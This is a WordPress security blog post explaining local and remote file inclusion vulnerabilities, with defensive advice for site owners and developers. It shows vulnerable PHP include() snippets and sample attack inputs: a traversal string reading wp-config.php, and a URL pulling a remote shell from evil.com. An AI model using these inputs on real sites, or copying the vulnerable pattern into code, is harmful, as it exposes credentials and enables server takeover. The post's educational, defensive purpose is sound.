BlogSecurity Tips
Security Tips

File Inclusion Vulnerabilities in WordPress: LFI and RFI Explained

File inclusion vulnerabilities allow attackers to read sensitive files or execute malicious code on your WordPress server. Learn how LFI and RFI attacks work.

WPSentry TeamMarch 8, 20262 min read
Table of Contents 4 sections

What Are File Inclusion Vulnerabilities?

File inclusion vulnerabilities occur when an application dynamically includes files based on user-controlled input without proper validation. There are two types:

  • Local File Inclusion (LFI) — Reading or executing files already on the server
  • Remote File Inclusion (RFI) — Including and executing files from an external server

In WordPress, these vulnerabilities most commonly appear in plugins and themes that use PHP's include(), require(), or file_get_contents() functions with unsanitized input.

Local File Inclusion (LFI)

LFI allows an attacker to read any file the web server has access to. This can expose critical information:

// Vulnerable plugin code
$template = $_GET['template'];
include("/wp-content/plugins/myplugin/templates/" . $template);

// Attacker request:
?template=../../../../wp-config.php

By using directory traversal (../), the attacker reads wp-config.php, which contains database credentials, authentication keys, and other secrets.

What Attackers Can Access via LFI

  • wp-config.php — Database credentials, secret keys, table prefix
  • /etc/passwd — System user accounts (Linux servers)
  • .htaccess — Server configuration and rewrite rules
  • Log files — Which may contain sensitive data or injectable content
  • Other plugin/theme files — Source code that reveals more vulnerabilities

Remote File Inclusion (RFI)

RFI is more dangerous because it allows the attacker to execute their own code on your server:

// Vulnerable code
$page = $_GET['page'];
include($page . ".php");

// Attacker request:
?page=https://evil.com/shell

The server fetches and executes the attacker's PHP file, giving them full control. Note: RFI requires allow_url_include to be enabled in PHP, which is disabled by default in modern configurations.

Prevention Strategies

For Site Owners

  1. Keep PHP updated — Modern PHP versions have allow_url_include disabled by default
  2. Update plugins and themes — File inclusion vulnerabilities are regularly patched
  3. Use a WAF — Firewalls can detect directory traversal patterns like ../
  4. File permissions — Ensure wp-config.php is not readable by other users (chmod 400 or 440)
  5. Disable directory listing — Add Options -Indexes to your .htaccess

For Developers

  1. Never use user input in file paths — Use a whitelist of allowed templates
  2. Use basename() — Strip directory traversal: $template = basename($_GET['template']);
  3. Set open_basedir — Restrict PHP file access to the WordPress directory
  4. Disable allow_url_include — In php.ini, ensure this is set to Off

FAQ

Frequently Asked Questions

Local File Inclusion (LFI) allows attackers to read or execute files already on the server (like wp-config.php), while Remote File Inclusion (RFI) allows attackers to include and execute files from an external server, giving them full control. RFI is more dangerous but requires allow_url_include to be enabled in PHP.

Through LFI, attackers can access wp-config.php (database credentials and secret keys), /etc/passwd (system user accounts), .htaccess (server configuration), log files, and other plugin/theme source code that may reveal additional vulnerabilities.

File inclusion vulnerabilities occur in plugins and themes that use PHP's include(), require(), or file_get_contents() functions with unsanitized user input. Attackers use directory traversal (../) to navigate outside intended directories and access sensitive files.

Keep PHP updated, update plugins and themes regularly, use a WAF that detects directory traversal patterns, set wp-config.php to chmod 400 or 440, disable directory listing, and use open_basedir to restrict PHP file access to the WordPress directory.

RFI is less common because modern PHP versions disable allow_url_include by default. However, LFI remains a significant threat as it doesn't require this setting and can still expose sensitive configuration files and credentials.

Tags

file-inclusionlfirfiwordpressserver-security

Related Posts

Security Tips

Phishing Attacks Targeting WordPress Sites: Fake Logins, Deceptive Emails, and Credential Theft

WordPress sites are frequently used to host phishing pages or are targeted by phishing campaigns to steal admin credentials. Learn how to protect yourself.

WPSentry Team·Mar 8, 2026
Security Tips

DDoS Attacks on WordPress: How to Keep Your Site Online Under Attack

Distributed Denial of Service attacks can take your WordPress site offline by overwhelming it with traffic. Learn how they work and how to protect against them.

WPSentry Team·Mar 8, 2026
Security Tips

WordPress Malware and Backdoors: How Attackers Maintain Persistent Access

Once a WordPress site is compromised, attackers install backdoors to maintain access even after vulnerabilities are patched. Learn how to detect and remove them.

WPSentry Team·Mar 8, 2026
Back to Blog